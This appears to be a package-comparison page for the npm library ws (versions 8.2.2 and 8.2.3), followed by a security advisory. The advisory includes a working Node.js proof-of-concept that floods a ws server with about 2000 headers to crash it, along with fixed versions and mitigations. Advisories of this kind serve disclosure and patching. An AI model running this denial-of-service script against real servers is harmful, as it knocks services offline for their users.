The npm package ws, a popular choice for implementing WebSocket clients and servers in Node.js, saw a new stable release with version 8.2.3 following version 8.2.2. Examining the package metadata reveals subtle but potentially impactful changes for developers utilizing this library. The core description remains consistent: a "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js," emphasizing stability and performance, key considerations for real-time communication applications. The developer dependencies, including testing frameworks like mocha and code quality tools like eslint and prettier, are identical across both versions, suggesting a continued commitment to code maintainability and consistent styling. Similarly, the peer dependencies, bufferutil and utf-8-validate, remain unchanged, indicating compatibility with the same native extensions for optimized buffer handling and UTF-8 validation.
While the code base likely underwent internal improvements and bug fixes, the most immediate difference lies in the dist section. Version 8.2.3 has an unpacked size of 126725 bytes compared to the 126490 bytes of version 8.2.2. This suggests a minor increase in the overall code footprint, potentially due to added features, slight modifications to existing functionality, or updated dependencies within the packaged code. The release dates also highlight the recency of 8.2.3, released on 2021-10-02, subsequent to 8.2.2's release on 2021-09-08. For developers, the upgrade from 8.2.2 to 8.2.3 should be relatively seamless, given the unchanged dependencies. However, reviewing the changelog associated with 8.2.3 is crucial to understanding the specific fixes, performance improvements or new features introduced for an informed decision making when upgrading.
All the vulnerabilities related to the version 8.2.3 of the package
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
--max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.server.maxHeadersCount to 0 so that no limit is applied.The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.